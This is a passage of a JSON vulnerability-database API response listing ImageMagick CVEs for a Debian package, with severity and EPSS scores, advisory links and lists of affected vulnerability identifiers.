{ "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-32546" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-agz5-g8mr-e7hn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78167?format=api", "vulnerability_id": "VCID-anh4-1hmn-yfh8", "summary": "ImageMagick: memory leak in identify -help", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-48541.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-48541.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-48541", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71894", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71913", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71885", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71923", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71934", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71958", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71941", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71965", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71969", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71954", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00697", "scoring_system": "epss", "scoring_elements": "0.71998", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-48541" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48541", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48541" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254987", "reference_id": "2254987", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254987" }, { "reference_url": "https://usn.ubuntu.com/6393-1/", "reference_id": "USN-6393-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6393-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-48541" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-anh4-1hmn-yfh8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49502?format=api", "vulnerability_id": "VCID-aqs4-r36j-ffe7", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-44267.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-44267.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-44267", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95762", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95807", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.9577", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95772", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95781", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95784", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95787", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95789", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95799", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95804", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.2209", "scoring_system": "epss", "scoring_elements": "0.95805", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-44267" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1030767", "reference_id": "1030767", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1030767" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2167593", "reference_id": "2167593", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2167593" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AINSUL2QBKETGYRPA7XSCMJWLUB44M6S/", "reference_id": "AINSUL2QBKETGYRPA7XSCMJWLUB44M6S", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AINSUL2QBKETGYRPA7XSCMJWLUB44M6S/" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/dos/51256.txt", "reference_id": "CVE-2022-44267", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/dos/51256.txt" }, { "reference_url": "https://www.debian.org/security/2023/dsa-5347", "reference_id": "dsa-5347", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://www.debian.org/security/2023/dsa-5347" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://imagemagick.org/", "reference_id": "imagemagick.org", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://imagemagick.org/" }, { "reference_url": "https://www.metabaseq.com/imagemagick-zero-days/", "reference_id": "imagemagick-zero-days", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://www.metabaseq.com/imagemagick-zero-days/" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html", "reference_id": "msg00008.html", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "reference_url": "https://usn.ubuntu.com/5855-1/", "reference_id": "USN-5855-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-1/" }, { "reference_url": "https://usn.ubuntu.com/5855-2/", "reference_id": "USN-5855-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-2/" }, { "reference_url": "https://usn.ubuntu.com/5855-4/", "reference_id": "USN-5855-4", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-4/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZLLS37P67CMBRML6OCG42GPCKGRCJNV/", "reference_id": "ZZLLS37P67CMBRML6OCG42GPCKGRCJNV", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:25:17Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZLLS37P67CMBRML6OCG42GPCKGRCJNV/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-44267" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aqs4-r36j-ffe7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82018?format=api", "vulnerability_id": "VCID-ay8n-59tt-k7cp", "summary": "ImageMagick: division by zero at MagickCore/resize.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27763.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27763.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27763", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31996", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32163", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32066", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3207", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31999", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32032", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3201", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31817", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27763" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27763", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27763" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894682", "reference_id": "1894682", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894682" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": 